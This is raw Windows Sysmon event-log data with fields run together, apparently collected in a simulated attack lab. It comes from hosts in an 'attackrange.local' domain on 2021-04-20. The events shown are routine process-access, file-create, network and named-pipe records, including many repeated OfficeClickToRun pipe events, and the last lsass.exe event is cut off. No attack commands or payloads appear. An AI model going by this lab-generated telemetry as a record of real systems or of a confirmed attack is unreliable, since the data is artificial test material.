14:57:58.670{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EBF6-607E-C40D-00000000BB01}3376C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076549Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:58.654{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{00000000-0000-0000-0000-000000000000}3376C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076548Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:58.654{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{00000000-0000-0000-0000-000000000000}3376C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076547Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:58.607{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EBF6-607E-C30D-00000000BB01}4472C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000050439Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:59.635{85C0FFC9-B7ED-607E-1100-00000000BB01}1000NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=0EA940E28DD2FBCC413CA29F336697BE,SHA256=980E31E7D70C48E37EE004A6F5F31F0E5D8F2A087B87403641D09C0664786B82,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050438Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:56.773{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52530-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000050437Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:59.103{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=670EBCAE7456BB395C024AE114D12519,SHA256=D2E6EA88BCACDD36D8134462171D2F3078D6CFB3FCAB59FCA93E506C2114FCF6,IMPHASH=00000000000000000000000000000000falsetrue 18141800x800000000000000076745Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.998{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 23542300x800000000000000076744Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:00.982{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A62C11847C63E06954851A7DABAE1C0B,SHA256=B6B33DEFC4D4C12FAA2D60D4B3EF80C584FFA8DF07CD6B1E0F06213442B6377B,IMPHASH=00000000000000000000000000000000falsetrue 18141800x800000000000000076743Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076742Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076741Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076740Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076739Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076738Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076737Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076736Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076735Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076734Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.967{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076733Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.951{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076732Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.951{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076731Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.951{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076730Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.951{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076729Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.951{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076728Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076727Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076726Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076725Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076724Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076723Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076722Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076721Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076720Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076719Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076718Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076717Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076716Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076715Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076714Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076713Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076712Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076711Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076710Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076709Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076708Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076707Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076706Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076705Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076704Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076703Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076702Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076701Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076700Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076699Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076698Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076697Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076696Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076695Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076694Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076693Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076692Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076691Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076690Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076689Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076688Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076687Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076686Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\FTA_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076685Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\FTA_4764C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076684Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_4764C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076683Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076682Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076681Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_4764C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076680Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_4764C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076679Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076678Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076677Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076676Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_4764C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076675Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_4764C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076674Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_4764C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 18141800x800000000000000076673Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-ConnectPipe2021-04-20 14:58:00.936{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092\ShortcutNotifier_1648C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe 10341000x800000000000000076672Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:00.842{A7A01FEF-B624-607E-0B00-00000000BB01}860988C:\Windows\system32\lsass.exe{A7A01FEF-EBF8-607E-DD0D-00000000BB01}4472C:\Program Files\Microsoft 